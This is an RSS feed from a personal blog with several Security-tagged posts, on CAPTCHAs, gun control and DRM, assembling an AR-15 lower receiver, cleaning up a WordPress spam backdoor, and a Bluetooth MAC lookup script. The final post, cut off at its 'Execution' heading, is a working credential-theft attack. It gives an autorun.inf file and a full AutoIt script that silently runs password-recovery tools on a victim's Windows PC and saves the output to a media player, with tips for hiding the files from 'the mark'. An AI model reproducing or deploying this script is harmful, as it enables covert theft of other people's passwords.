<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kalimat al-Mutafalsif &#187; Security</title>
	<atom:link href="http://thesnarky.com/category/interests/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://thesnarky.com</link>
	<description>The Words of the One Who Calls Himself a Philosopher</description>
	<lastBuildDate>Tue, 26 Oct 2010 22:57:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>I Failed a Turing Test!</title>
		<link>http://thesnarky.com/2008/10/24/i-failed-a-turing-test/</link>
		<comments>http://thesnarky.com/2008/10/24/i-failed-a-turing-test/#comments</comments>
		<pubDate>Sat, 25 Oct 2008 04:11:01 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Annoyances]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stupidity]]></category>

		<guid isPermaLink="false">http://thesnarky.com/?p=239</guid>
		<description><![CDATA[OK, the title lies, but I'm cleaning up my desktop and came across a screenshot from a few days ago. It is a <a href="http://en.wikipedia.org/wiki/CAPTCHA">CAPTCHA</a> that I, for the life of me, could only make sense of as: Six E Pi Pi. So, in this case it worked, right? The human figured out what the letters should be, except that, as clearly as those are Pis, Pi is not a letter on my keyboard. I figured I should get a screenshot to show where CAPTCHAs are going:

<a href="http://thesnarky.com/html/pictures/captcha/pi_CAPTCHA.png"><img src="http://thesnarky.com/html/pictures/captcha/pi_CAPTCHA.png" alt="" /></a>

Sadly, CAPTCHAs are a technology we need to combat spam, which accounts for at least <a href="http://www.maawg.org/about/MAAWG20072Q_Metrics_Report.pdf">80%</a> of email today, not to mention message boards, instant messages, or text messages. However, we're merely engaged in a technology arms race with spammers; this is *not* a technology that is winning any fights, we just try to stay one step ahead. This is increasingly hard with <a href="http://www.getafreelancer.com/projects/Data-Entry/Captcha-Entry-Teams-from-India.html">CAPTCHA entry</a> being a job in countries with lower incomes, spammers cheating by <a href="http://www.boingboing.net/2004/01/27/solving-and-creating.html">offering porn</a> in return for solving a CAPTCHA, and (in a case that doesn't just apply to humans) CAPTCHA breaking <a href="http://www.virtualblight.com/articles/?p=96">driving AI research</a>. Basically, no 'new' CAPTCHA technology is going to keep spammers out for long. A bleak future indeed. On the other hand, we already have 80%; how much worse can it get? I think the real answer lies in spam filters, although for the most part those are also in a mere arms race, but at least then you can control your own computer, not just leave the image out there for another human to crack. ]]></description>
			<content:encoded><![CDATA[<p>OK, the title lies, but I'm cleaning up my desktop and came across a screenshot from a few days ago. It is a <a href="http://en.wikipedia.org/wiki/CAPTCHA">CAPTCHA</a> that I, for the life of me, could only make sense of as: Six E Pi Pi. So, in this case it worked, right? The human figured out what the letters should be, except that, as clearly as those are Pis, Pi is not a letter on my keyboard. I figured I should get a screenshot to show where CAPTCHAs are going:</p>
<p><a href="http://thesnarky.com/html/pictures/captcha/pi_CAPTCHA.png"><img src="http://thesnarky.com/html/pictures/captcha/pi_CAPTCHA.png" alt="" /></a></p>
<p>Sadly, CAPTCHAs are a technology we need to combat spam, which accounts for at least <a href="http://www.maawg.org/about/MAAWG20072Q_Metrics_Report.pdf">80%</a> of email today, not to mention message boards, instant messages, or text messages. However, we're merely engaged in a technology arms race with spammers; this is *not* a technology that is winning any fights, we just try to stay one step ahead. This is increasingly hard with <a href="http://www.getafreelancer.com/projects/Data-Entry/Captcha-Entry-Teams-from-India.html">CAPTCHA entry</a> being a job in countries with lower incomes, spammers cheating by <a href="http://www.boingboing.net/2004/01/27/solving-and-creating.html">offering porn</a> in return for solving a CAPTCHA, and (in a case that doesn't just apply to humans) CAPTCHA breaking <a href="http://www.virtualblight.com/articles/?p=96">driving AI research</a>. Basically, no 'new' CAPTCHA technology is going to keep spammers out for long. A bleak future indeed. On the other hand, we already have 80%; how much worse can it get? I think the real answer lies in spam filters, although for the most part those are also in a mere arms race, but at least then you can control your own computer, not just leave the image out there for another human to crack. </p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2008/10/24/i-failed-a-turing-test/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gun Control and Music&#124;Software Piracy</title>
		<link>http://thesnarky.com/2008/09/25/gun-control-and-musicsoftware-piracy/</link>
		<comments>http://thesnarky.com/2008/09/25/gun-control-and-musicsoftware-piracy/#comments</comments>
		<pubDate>Fri, 26 Sep 2008 02:24:11 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Interests]]></category>
		<category><![CDATA[Real Life Rights]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stupidity]]></category>

		<guid isPermaLink="false">http://thesnarky.com/?p=221</guid>
		<description><![CDATA[Tragically, there was another school shooting at the beginning of this week. This one was in Finland, and their second in 12 months which left 10 dead, 11 including the shooter. We can expect the cry for more gun control, both domestically, and in Finland, so I pulled out a post I've been saving due to not having time to finish it. ]]></description>
			<content:encoded><![CDATA[<p>Tragically, there was <a href="http://news.google.com/news?hl=en&tab=wn&ned=us&nolr=1&q=finland+shooting&btnG=Search">another school shooting</a> at the beginning of this week. This one was in Finland, and their second in 12 months which left 10 dead, 11 including the shooter. We can expect the cry for more gun control, both domestically, and in Finland, so I pulled out a post I've been saving due to not having time to finish it. </p>
<p><strong>Finland</strong></p>
<p>First I want to address the Finland shooting. Finland is <a href="http://media3.washingtonpost.com/wp-dyn/content/graphic/2007/11/08/GR2007110800960.gif">third in the world</a> in terms of gun ownership per capita, behind the US, and Yemen. This is because hunting is huge in Finnish culture, as <a href="http://www.smh.com.au/news/opinion/hunters-dont-kill-finns/2008/09/25/1222217427624.html">one person</a> puts it, "the national sport". And yet more people are killed by knives than guns (according to that article). The youth are raised around weapons, they can legally own a firearm at 15 with parental permission, and for handguns they must be a member of a gun club. Yet until 12 months ago, they'd never had a tragedy like this.</p>
<p>The conclusion we should be able to come to is that it's not the gun's fault, it's the human's. You have a person capable of cold-blooded, calculated murder, and no amount of laws will stop them from carrying out what they want to do. It requires human intervention: parents who care, friends who realize when someone's hurting inside, kids that are strong enough in their self-image that they can get through school without bullying. As many are so fond of criticizing the War on Terror, it's more than just people with guns; it's a social problem that requires compassion and understanding. However, if those fail, you had better be prepared to fight for what you love, because when a person reaches the utter mental darkness these killers were in, there's going to be no reasoning. </p>
<p>It's worth pointing out that in this most recent case the killer had homemade bombs with him, as did the Columbine shooters; if they had had no access to guns, they would still have been able to kill. </p>
<p>But that brings us to Gun Control.</p>
<p><strong>Gun Control</strong></p>
<p>Gun Control: At its heart, the idea is fairly basic: to control the guns that are in public circulation so that bad people can't get them. While I know people who would argue against any limitation on weapons, I think most will agree that there are people out there who shouldn't own firearms, just like there are people who shouldn't be able to drive, <a href="http://kotaku.com/5054772/jack-thompson-disbarred">people</a> who shouldn't be allowed to practice law, and people who shouldn't be allowed to practice medicine. One obvious answer here is felons: if you're convicted of a violent crime, you forfeit your right to bear arms. </p>
<p>Unfortunately, in recent years gun 'control' has gone way beyond 'control'. Now people want a gun ban in the name of gun control in some places, such as the District of Columbia (recently overturned) and Britain. Yes, this will keep guns out of the hands of law-abiding citizens; unfortunately we have to remember that these guys who shot up their schools were not law-abiding. They committed many acts of cold-blooded murder, and no gun ban would have prevented that. Now, it would have made it harder to get the gun, but as we can see <a href="http://www.sightm1911.com/lib/rkba/violence_increase_with_British_gun_ban.htm">from Britain</a>, it would by no means have stopped them from getting guns. There, violence went up once private citizens lost the right to bear handguns. I've heard first-hand accounts from friends that if they ever did something wrong and the bobbies wanted to stop them, they'd simply run, since the worst they had to face was a nightstick and they could outrun the cops. </p>
<p><strong>Piracy</strong></p>
<p>Now, I'm going to play to my (intended) audience for a while. You know I'm not just some crazy gun nut; I also fancy myself a (white hat) hacker, and know most of the arguments for and against music|software piracy. What does that have to do with gun control? Let's examine DRM, or "music piracy control". DRM is a system whereby a company can have "absolute" control over their intellectual property, in this case let's say music. If I went to any hacker and said that Congress passed a law requiring DRM on every digital music download, to prevent piracy, do you think they'd be put out at all? No, they'd laugh, and explain how in 3 minutes or less they'd be able to bypass the DRM (I'll refrain from linking to those news stories... I value my freedom). I know, I know, this is completely unrelated! Or is it?</p>
<p>In both cases we have an arbitrary control system, X, designed to stop the user from doing Y. In the case of gun control, X is "legal ramifications" and Y is "buying guns", and in the case of DRM, X is "DRM" and Y is "copying the music". In both cases it is the honest people that suffer here from a lack of freedom and security. In the case of guns it's physical security and the freedom to defend yourself, and in the case of DRM it's the lack of freedom to use what you've bought and the security that if your computer dies you can have a backup. So why is it that one of these is a perfectly smart move, and the other will never work?</p>
<p>As a security professional I know that there's no such thing as a secure system; I don't believe that for a computer with limited physical access and a decent firewall. So why would I believe that any country, or even any city, could pull off a complete gun ban, eliminating the ability for criminals to get their hands on them? Now, in the case of my computer, I plan for Bad Things to happen. I keep backups, I make sure there's spare hardware around just in case, and I look at my security logs to make sure. But how do we plan for Bad Things to happen when the gun ban falls through? Should we sit around and pray the cops come quicker than the 5-minute average? I've had my car trashed before, had two friends of the criminal take their time and walk away right past the cops, who took 10 minutes to get to my call. Do I have faith that they'll be that much quicker when I call and say someone's held me up at gunpoint? Or that someone's broken in and has a gun? Of course not! I'm not saying citizens should take the law into their own hands, just be given a chance to defend themselves until the cops can show up. </p>
<p><strong>Deal with the Problem</strong><br />
For the sake of the argument, I'll say we have a completely 100% secure gun ban in effect in America. This won't stop violence, as Britain has shown us; there must be another cause. In the end, crime is a human (not social; humans created society, therefore it's a human problem at its root) problem, and will be around as long as humanity is. What we, as a society and a race, need to do is recognize those human problems and combat them, not the weapons used. When guns are banned, knives will be used. When knives are banned, <a href="http://en.wikipedia.org/wiki/Shiv_(weapon)">shanks</a> will be made (look at prison); when all sharp objects are eliminated from our society, ropes will be used to strangle (again, look at prison). There's no end to violence; the best we can hope to do is recognize what causes humans to become killers, and fix it.</p>
<p>The most obvious period is during childhood. There's a recurring pattern of these school shootings where the kids doing the shooting were "outcasts" in their school, or were ridiculed, or bullied. Those are by no means reasons for murder, not even for retaliation! But those killers should stand out to school counselors as people who need extra concern (not pills, actual human care), and stand out to the students as people who need their compassion. We're a society that wants to do away with moral and personal responsibility, when what we should be doing is recognizing that a successful society will care for each other. </p>
<p><strong>Conclusion</strong><br />
In conclusion, I feel that the true control needed in our society is that of controlling ourselves. Guns are regulated enough; we need to turn ourselves now to the people next to us in society: that man on the bus who's always looking sad, that driver who just cut you off, the quiet kid in your class that you all think is just a bit odd. Take it upon yourself to say hi, or not flick off the driver, or ask him to sit with you at lunch. Not because this may prevent a shooting, or a suicide, or an incident of road rage, just because they're humans too, and we all know the dark places a human mind can go to when depressed. I guarantee you, if we spent as much time and focus on helping those next to us in society (I don't mean handouts, socialized health care, or any of that, I mean honest-to-goodness one-citizen-helping-another kindness) then violence would go down in a way we'll never know through straight gun control.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2008/09/25/gun-control-and-musicsoftware-piracy/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Lower Assembly Done</title>
		<link>http://thesnarky.com/2008/09/21/lower-assembly-done/</link>
		<comments>http://thesnarky.com/2008/09/21/lower-assembly-done/#comments</comments>
		<pubDate>Sun, 21 Sep 2008 21:31:27 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Digital Rights]]></category>
		<category><![CDATA[Gun smithing]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/?p=210</guid>
		<description><![CDATA[As I mentioned before, I'm putting together an AR-15, and my next few posts will be the story of how it's been put together. I'm also using this project to test out Picasa, so I'll use that to post my images (just as soon as it finishes scanning a few of my automated rip folders, <a href="http://thesnarky.com/2007/10/14/i-can-has-pictures/">such as icanhascheezburger</a>; forgot I had all of them!)

Before I begin, I'd like to link to a schematic which can be found <a href="http://world.guns.ru/assault/ar15_blow.jpg">here</a>. This way when I mention random parts you can find them and play along!]]></description>
			<content:encoded><![CDATA[<p>As I mentioned before, I'm putting together an AR-15, and my next few posts will be the story of how it's been put together. I'm also using this project to test out Picasa, so I'll use that to post my images (just as soon as it finishes scanning a few of my automated rip folders, <a href="http://thesnarky.com/2007/10/14/i-can-has-pictures/">such as icanhascheezburger</a>; forgot I had all of them!)</p>
<p>Before I begin, I'd like to link to a schematic which can be found <a href="http://world.guns.ru/assault/ar15_blow.jpg">here</a>. This way when I mention random parts you can find them and play along!</p>
<p>This first post is about the lower assembly, which is the buttstock and lower receiver (which has the hammer, trigger, magazine well, etc.). At this point I'd like to note I'm using a great book by Walt Kuleck and Clint McKee, <a href="http://www.midwayusa.com/eproductpage.exe/showproduct?saleitemid=559952">The AR-15 Complete Assembly Guide</a>; it's got nice pictures and very, very good detail on how you'll screw stuff up if you don't listen. Well worth the $17!</p>
<p><strong>Parts</strong></p>
<p><em>Lower Receiver</em><br />
I bought a <a href="http://www.dpmsinc.com/store/products/?prod=863&cat=1867">DPMS stripped lower receiver</a> from a local gun enthusiast, which cost $158.73 after taxes, cable lock fee, etc. On the AR, this stripped lower receiver, meaning it is just the frame, no trigger, hammer, nothing on it, counts on its own as an assault rifle, because it has the serial number on it. So I walked out of there with a piece of metal in a locked dry box with a cable lock through the mag well, to make it 'safe' to transport. </p>
<p><em>Lower Receiver Bits</em><br />
I'm not too particular about my trigger yet, so I also picked up a <a href="http://www.dpmsinc.com/store/products/?prod=943&cat=1780">DPMS Lower Receiver Parts Kit</a> for $56.99 (Don't buy anything direct from DPMS by the way, you can always find it cheaper). Some may ask why I didn't just buy a completed lower receiver, but I wanted to understand how everything works, and say I built every inch of this gun. </p>
<p><em>Buttstock</em><br />
All that was left was the stock, and I snagged a <a href="http://www.midwayusa.com/eproductpage.exe/showproduct?saleitemid=178188">Command Arms 6-position</a> stock assembly for $92.99. It's a very nice stock, and I'm quite happy with its sturdiness as well as its function. It has rails on the right side and a 4-battery storage area on the left side (can be swapped for more rails), which is more functionality than I'll need for a while. It went on in about 5 minutes, including forgetting to put a detent in and having to redo it.</p>
<p><strong>Assembly</strong><br />
The assembly was easier than I expected in terms of simplicity (piece X goes in slot Y), but harder in terms of executing it (piece X really does not want to go into slot Y, and X's spring is fighting me too). It took about two hours, including redoing a few steps to make sure it was right, flinging detents all over the room as I learned why they say to do something one way, and searching my house for various tools I thought I already had. </p>
<p>The trigger guard's been the hardest part so far, since its roll pin just did not want to go in and required a "motivator". After that went in, I put in the magazine catch so I could mount the gun on a handy little bench I have, and then moved on to the trigger and disconnector. Somewhere in there the bolt catch went in, and that's where I stopped last night. This morning I got up and put in the hammer, safety, pistol grip, and buttstock. It was very straightforward, but like I said above, there are a few places where you really should get a tool to do the job for ya, like the front take-down pin. Otherwise you're gonna shoot the spring all over the room, and don't even think about finding the darn detent afterwards!</p>
<p>So now I've gotta go order all the upper parts, a receiver, bolt/bolt carrier, barrel, and some hand guards. I'll be getting a scope eventually, but may pick up flip up sights due to cost for this first build, not sure. I have pictures of the whole process, if you know how to get a hold of me in real life I'll pass on the URL.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2008/09/21/lower-assembly-done/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>194.110.162.23</title>
		<link>http://thesnarky.com/2008/03/26/19411016223/</link>
		<comments>http://thesnarky.com/2008/03/26/19411016223/#comments</comments>
		<pubDate>Thu, 27 Mar 2008 03:19:10 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stupidity]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2008/03/26/19411016223/</guid>
		<description><![CDATA[At some point in the recent past my site was compromised by Wordpress.net.in spam. I don't know exactly when the back door was put in place since I haven't been very active on this site, though I do know that on March 20th 194.110.162.23 hit default-filters.php and uploaded the malicious code to inject spam into the footer of my pages. Unfortunately the attack is for a different version of Wordpress so rather than infect me with ads, it just screwed things up royally. Maybe that's a good thing as I noticed it.

A great write up of how to clean this mess up can be found <a href="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/">here</a>.

To sum it up:
<ul>
	<li>Remove wp-includes/class-mail.php; it's fake.</li>
	<li>Take out the lines hooking into the footer in wp-includes/default-filters.php</li>
	<li>Remove the line from the top of wp-includes/default-filters.php that accepts a file given a random GET variable.</li>
</ul>



The take away lesson here is: Even if you're not actively publishing on your blog, you better make sure your software is up to date. I've been busy with other stuff and neglected mine, unfortunately.

EDIT: I've done some poking. 194.110.162.23 is out of "Extended Host" in New York City. I'll refrain from scanning it, though I am darn tempted to see what back doors were opened on that box. As it is, I'll just email the host and inform them of the troubles.]]></description>
			<content:encoded><![CDATA[<p>At some point in the recent past my site was compromised by WordPress.net.in spam. I don't know exactly when the back door was put in place since I haven't been very active on this site, though I do know that on March 20th 194.110.162.23 hit default-filters.php and uploaded the malicious code to inject spam into the footer of my pages. Unfortunately the attack is for a different version of WordPress so rather than infect me with ads, it just screwed things up royally. Maybe that's a good thing as I noticed it.</p>
<p>A great write up of how to clean this mess up can be found <a href="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/">here</a>.</p>
<p>To sum it up:</p>
<ul>
<li>Remove wp-includes/class-mail.php; it's fake.</li>
<li>Take out the lines hooking into the footer in wp-includes/default-filters.php</li>
<li>Remove the line from the top of wp-includes/default-filters.php that accepts a file given a random GET variable.</li>
</ul>
<p>The take away lesson here is: Even if you're not actively publishing on your blog, you better make sure your software is up to date. I've been busy with other stuff and neglected mine, unfortunately.</p>
<p>EDIT: I've done some poking. 194.110.162.23 is out of "Extended Host" in New York City. I'll refrain from scanning it, though I am darn tempted to see what back doors were opened on that box. As it is, I'll just email the host and inform them of the troubles.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2008/03/26/19411016223/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bluetooth Device Lookup</title>
		<link>http://thesnarky.com/2007/11/22/bluetooth-device-lookup/</link>
		<comments>http://thesnarky.com/2007/11/22/bluetooth-device-lookup/#comments</comments>
		<pubDate>Fri, 23 Nov 2007 01:33:23 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Bluetooth]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/11/22/bluetooth-device-lookup/</guid>
		<description><![CDATA[Happy Thanksgiving! I'm spending the break catching back up on the state of <a href="http://www.bluetooth.com/bluetooth/">Bluetooth</a> security because, hey, I love the subject. Everyone has a phone with Bluetooth, just about, and many overlook it as a security hole because they feel there's nothing insidious that can be done with just replacing wires with some radio broadcasts. I'll give a quick rundown on how to get Bluetooth working under Linux, then the software I use, and finally give a tool I wrote watching the Dallas Game to speed up identification of Bluetooth devices.]]></description>
			<content:encoded><![CDATA[<p>Happy Thanksgiving! I'm spending the break catching back up on the state of <a href="http://www.bluetooth.com/bluetooth/">Bluetooth</a> security because, hey, I love the subject. Everyone has a phone with Bluetooth, just about, and many overlook it as a security hole because they feel there's nothing insidious that can be done with just replacing wires with some radio broadcasts. I'll give a quick rundown on how to get Bluetooth working under Linux, then the software I use, and finally give a tool I wrote watching the Dallas Game to speed up identification of Bluetooth devices.<br />
<span id="more-185"></span><br />
<strong>Hardware</strong><br />
Naturally, those "USB Bluetooth devices" that you see in stores are for Windows, so how do you know what will work in Linux? Check <a href="http://www.holtmann.org/linux/bluetooth/features.html">this page</a>, put together by Marcel Holtmann, to get an idea. If a device has an HCI version, it almost definitely works under Linux. Unfortunately it hasn't been updated in over a year and a half (March 31st of 2006), but it gives a good estimate of which brands will work. I looked for devices that had decent <a href="http://newegg.com">Newegg</a> ratings and a history of providing Linux support. In the end I grabbed an <a href="http://www.iogear.com/main.php?loc=product&Item=GBU221">IOGEAR GBU221</a>, which has worked perfectly out of the box. Ironically this did NOT get good reviews on Newegg, and Best Buy had it cheaper, but I promise that is a very rare occurrence. </p>
<p><strong>Software</strong><br />
As far as the drivers go, it's <a href="http://www.bluez.org/">BlueZ</a> or nothing. This is an excellent package that works well enough to be qualified Bluetooth 2.0, though with some implementations out there this may or may not be a selling point. But the point of the matter is, nab this and it'll work just like Windows.<br />
As far as software to interact with Bluetooth devices, it depends on what you want to do. I don't connect my phone via Bluetooth (preferring a USB cable) so I can't help you with that. However, make sure you have hcitool (part of BlueZ) installed to pair with devices and scan for new ones around you. To test your setup, put your phone (or headset, or keyboard, or whatever) into discoverable mode and then run:<br />
<code>hcitool scan</code><br />
If you're set up, it should detect your device and identify its MAC address and device name.<br />
After you're set up legally checking on your phone, you can try checking out others. Try an hcitool scan in a busy area and see if any phones show up. Or perhaps a parking lot if you're really devious. I'd recommend checking out the <a href="http://trifinite.org">Trifinite Group</a> for ideas of what evilness can go on over Bluetooth.</p>
<p><strong>Device Lookup</strong><br />
Now that you have my 2 cent description of how to get Bluetooth working on Linux (Ubuntu 7.10) and have done your own research on what vulnerabilities (might) exist out there, you may be interested in a quick way to identify devices you find. Quick identification of devices around you allows for quick knowledge of what exploits exist. I'm not advocating breaking devices, but this may be extremely useful when penetration testing a company or school. I wrote a quick Perl script that will take a given MAC address and return the company that device is registered to. It has two text files with it: one is a list of known Bluetooth manufacturers and the device prefixes registered to them, the other is a full list of all MAC prefixes and who they're registered to. Download this <a href="http://thesnarky.com/wp-content/uploads/2007/11/mac_address.tar">tarball</a>, untar the file, change into the mac_address directory, and then run it using:</p>
<p><code><br />
tar -xf mac_address.tar<br />
cd mac_address<br />
perl mac_lookup.pl 00:16:8f:c0:5X:XX</code></p>
<p>It'll spit out info looking a little like:</p>
<p><code><br />
Looking up: 00:16:8f:c0:51:11<br />
Manufacturer Prefix: 00:16:8f<br />
Device Type: c0:51:11<br />
Manufacturer: GN Netcom as<br />
</code></p>
<p>I'm quickly porting it to php and tossing all that info into a database so you'll be able to bounce requests off of a php page to grab the relevant information. More information will come on that in a day or two, once I have it up and running. Of course all this was inspired by the <a href="http://trifinite.org/trifinite_stuff_blueprinting.html">BluePrinting</a> project, and I hope to work that into my database.</p>
<p>EDIT: Whoops, it appears I misread a paper and wrote a hasty article. It is not possible to assume the second three bytes of a Bluetooth MAC are the device model, as every manufacturer is different. I've changed bits of the above article to reflect this knowledge, and changed the output of my tool. I'd also like to note there is another tool that is similar to this, @stake's redfang tool. However, that tool is used to *find* non-discoverable devices, via brute force, whereas mine is a simple lookup tool.</p>
<p>Also it should be noted that I'm using the term Bluetooth MAC address, though this may not be the best term. It's also called the Bluetooth Device Address.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/11/22/bluetooth-device-lookup/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>iHack &#8211; The Beginning</title>
		<link>http://thesnarky.com/2007/11/06/ihack-the-beginning/</link>
		<comments>http://thesnarky.com/2007/11/06/ihack-the-beginning/#comments</comments>
		<pubDate>Tue, 06 Nov 2007 06:04:41 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[iPod]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/11/06/ihack-the-beginning/</guid>
		<description><![CDATA[A friend of mine passed on his used 60GB video iPod to me, which was very much appreciated as my old Sony MD-Walkman still works, but is hindered by all kinds of <a href="http://en.wikipedia.org/wiki/ATRAC">nasty DRM</a>. Nasty enough that I have been unable to even change any songs on there in the past three years as I lost the software. Nasty enough that nobody has bothered to reverse engineer it because even with documentation it's a bear. So I had been planning on getting something, and this was quite a nice graduation present. I immediately replaced the firmware with something a bit more "free", <a href="http://www.rockbox.org/">Rockbox</a>, and named her 'Katana'. Now I've got a nice flat file browser that lets me drop in almost any type of file I want. This doesn't stop at music and videos, I can also read text files, view pictures, etc. Naturally, that's not enough for me *wicked grin*. Read on to see some fun hacks that can be had with your iPod.]]></description>
			<content:encoded><![CDATA[<p>A friend of mine passed on his used 60GB video iPod to me, which was very much appreciated as my old Sony MD-Walkman still works (God bless duct tape), but is hindered by all kinds of <a href="http://en.wikipedia.org/wiki/ATRAC">nasty DRM</a>. Nasty enough that I have been unable to even change any songs on there in the past three years as I lost the software. Nasty enough that nobody has bothered to reverse engineer it because even with documentation it's a bear. So I had been planning on getting something, and this was quite a nice graduation present. I immediately replaced the firmware with something a bit more "free", <a href="http://www.rockbox.org/">Rockbox</a>, and named her 'Katana'. Now I've got a nice flat file browser that lets me drop in almost any type of file I want. This doesn't stop at music and videos, I can also read text files, view pictures, etc. Naturally, that's not enough for me *wicked grin*. Read on to see some fun hacks that can be had with your iPod.<br />
<span id="more-180"></span><br />
<strong>iHack</strong><br />
Now, you hopefully have gleaned from above that an iPod (and basically any media player) is just a hard drive that looks good. Shove some proprietary firmware on there, ask $300 and all of a sudden that <a href="http://www.rapidrepair.com/Merchant2/merchant.mvc?Screen=PROD&Product_Code=1616-iPod_Hard_Drive_Disk_MK6008GAH&Category_Code=">60GB laptop hard drive</a> just doubled or tripled in cost. What you end up buying is essentially a large thumb drive, or small external hard drive, depending on how you look at it, which means we can use it as such. This hack comes from the Spring '06 issue of 2600, though that article had some errors which I've addressed, and some parts (such as autorun) which were just completely left out. </p>
<p>In this attack, you take your -insert favorite media player here- to someone with a computer, and ask if you can quickly charge it for 5 minutes before you get back to work. You may sweeten the deal by offering to pass along a song, or share something with them they want. But once you walk away, you have all their passwords. Too good to be true? Not a chance! (Of course I'm targeting Windows in this, if you want to attack Macs or Linux, you just need to improvise a tad more).</p>
<p><strong>Setup</strong><br />
To start with, you need to be able to access the hard drive on your media player. Using Rockbox is an easy way to do this. Once you have access to the media device, we're going to create a file in its root directory, autorun.inf. Something to the effect of:</p>
<blockquote><p>
[autorun]<br />
shellexecute=ipod.exe<br />
icon=ipod.ico</p></blockquote>
<p>What the above does is declare that it's the autorun file, set a custom icon for the iPod (have to make it look the part), and run a special exe we cook up. Save this file, and go grab <a href="http://www.autoitscript.com/autoit3/">AutoIt</a>. I've just started using this program in the last 24 hours and man do I like it. Very simple to create exe files. What we're going to do is use this to execute a few password recovery toolkits. The specific ones aren't important, but I'm using ones by <a href="http://www.nirsoft.net/utils/index.html">Nirsoft</a>, MessenPass, Network Password Recovery, and Mailpass View currently for this demo. Create a folder in the root of your media player "\Hacks\Password\Software\take" and all of the parent folders. You'll want to drop all hacks into the Software folder, and the results of the scans will pop up in the take folder. </p>
<p>The icon I picked (since this is an iPod) was the following:<br />
<img src="http://thesnarky.com/html/pictures/ipod/ipod.ico" alt="" /></p>
<p>The exe we're going to create is made with the following AutoIt script, which I won't go into detail on as it's fairly straightforward, though the formatting is really bad in WordPress, I apologize. A nice version of the file is found <a href="http://thesnarky.com/html/pictures/ipod/ipod.au3">here</a>.</p>
<p><em>Run(@ComSpec & ' /c ".\Hacking\Password\Software\mspass.exe /stext .\Hacking\Password\Software\take\mspass.log"', @ScriptDir, @SW_HIDE)<br />
sleep(200)<br />
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mailpv.exe /stext .\Hacking\Password\Software\take\mailpv.log"', @ScriptDir, @SW_HIDE)<br />
sleep(200)<br />
Run(@ComSpec & ' /c ".\Hacking\Password\Software\netpass.exe /stext .\Hacking\Password\Software\take\netpass.log"', @ScriptDir, @SW_HIDE)<br />
sleep(3000)<br />
Run(@ComSpec & ' /c "COPY .\Hacking\Password\Software\take\*.log .\Hacking\Password\Software\take\all.log"', @ScriptDir, @SW_HIDE)<br />
sleep(3000)<br />
Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC<br />
Dim $Location = @WorkingDir & '.\Hacking\Password\Software\take\'<br />
Dim $FileName = "all.log"<br />
FileMove($Location & $FileName , $Location & $DateTime & ".txt",1)<br />
sleep(3000)<br />
Run(@ComSpec & ' /c "del .\Hacking\Password\Software\take\*.log"', @ScriptDir, @SW_HIDE)<br />
sleep(1000)</em></p>
<p>Once you have that, build it and name the resulting file ipod.exe. Drop that into the root directory of the media device. We should be all set up now; to check, double-click the ipod.exe and see if a text file pops up (it should take roughly 11 seconds to finish everything). If it does, continue on... if not, go back up to creating the exe. Once all the files are in place, you probably want to set the files and folders for the hack to hidden. No reason why the mark should see "Hacking" as a root folder, eh?</p>
<p><strong>Execution</strong><br />
